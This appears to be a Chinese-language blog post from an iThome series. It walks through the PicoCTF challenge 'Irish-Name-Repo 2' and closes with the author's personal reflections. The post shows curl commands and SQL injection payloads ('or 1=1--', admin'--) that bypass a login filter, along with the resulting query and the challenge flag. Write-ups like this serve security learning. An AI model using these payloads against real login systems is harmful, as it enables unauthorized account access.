iT邦幫忙

2021 iThome 鐵人賽

DAY 27
1
Security

從 PicoCTF 中跨領域學資訊安全系列 第 27

[Day 27] Web 小迷茫

今天要解的題目和昨天有關聯
是他進階的2.0
沒錯,又是愛爾蘭人

Irish-Name-Repo 2 ( 350 points)

There is a website running at https://jupiter.challenges.picoctf.org/problem/64649/ (link). Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login! or http://jupiter.challenges.picoctf.org:64649
Hints
The password is being filtered.

昨天有關於 SQli
今天也繼續往這方面聯想
link 點入後提供了一個登入頁面

<form action="login.php" method="POST">
    <fieldset>
        <div class="form-group">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username" class="form-control">
        </div>
        <div class="form-group">
            <label for="password">Password:</label>
            <div class="controls">
                <input type="password" id="password" name="password" class="form-control">
            </div>
        </div>
        <input type="hidden" name="debug" value="0">

        <div class="form-actions">
            <input type="submit" value="Login" class="btn btn-primary">
        </div>
    </fieldset>
</form>

Oh NO
使用昨天的方式沒效

root@kali:/media/sf_CTFs/pico/Irish-Name-Repo_2# curl "https://2019shell1.picoctf.com/problem/64649/login.php" --data "username=admin&password='+or+1=1--" && echo
<h1>SQLi detected.</h1>

admin'or'1'='1 --
SQli detected

試試看調整 debug 參數
來檢查 SQli
改改看把0改成1

root@kali:/media/sf_CTFs/pico/Irish-Name-Repo_2# curl 
<pre>username: admin'--
password: 1
SQL query: SELECT * FROM users WHERE name='admin'--' AND password='1'
</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{m0R3_SQL_plz_015815e2}</p>

10/13
我的好朋朋提醒我,昨天這題 key point 沒抓對
不好意思各位,我想挑戰350分的題
解的有困難去看 write up
語意上有些誤會
真對不起大家

這題必須要用 admin 的身分進去,
但是我沒有 admin 的密碼,
所以要把 SQL 查詢密碼的地方註解掉,
帳號輸入admin' -- 就會拿到 flag

我昨天的錯誤在於強調 debug mode 0改成1
這段code昨天沒刪除
他是不需要的扣刪掉
就噴flag ㄌ
"https://2019shell1.picoctf.com/problem/64649/login.php" --data "username=admin'--&password=1&debug=1" && echo
是錯的喔!!!

為什麼我會想debug改成1試試呢?
debug 改成 1 會出現 debug 的模式,
可以讓你 debug 知道你傳的帳號密碼會進去資料庫的時候
SQL 查詢語句長怎麼樣

picoCTF{m0R3_SQL_plz_015815e2}

附上我參考的 write up
https://0xdiablos.github.io/Irish-Name-Repo/

今天莫名的很迷茫焦躁
情緒在全身流竄
明白快樂是生命中一閃而逝的煙火
你們也為了那點光而努力生活嗎?
否則怎會有那句話
人生不如意十之八九
或許每個人都有陰影吧
如何面對自己的惡夢及缺陷
我也還學不會
我逃避了好多年
希望今年的我夠勇敢
足以面對


上一篇
[Day 26] Web 小廚娘
下一篇
[Day 28] Crypto 小替換
系列文
從 PicoCTF 中跨領域學資訊安全30

尚未有邦友留言

立即登入留言